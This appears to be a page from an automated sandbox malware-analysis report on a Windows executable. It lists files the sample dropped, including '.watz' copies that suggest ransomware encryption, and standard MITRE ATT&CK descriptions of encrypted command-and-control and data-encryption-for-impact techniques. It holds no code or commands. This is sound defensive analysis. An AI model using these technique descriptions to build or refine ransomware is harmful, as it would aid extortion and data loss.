Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\SystemID\PersonalID.txt

C:\Users\user\.curlrc

C:\Users\user\.curlrc.watz (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.watz (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.watz (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json.watz (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log.watz (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old.watz (copy)

Windows Analysis Report
file.exe

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.
Tactics:	Impact
Data Sources:	Cloud Storage: Cloud Storage Modification, Command: Command Execution, File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre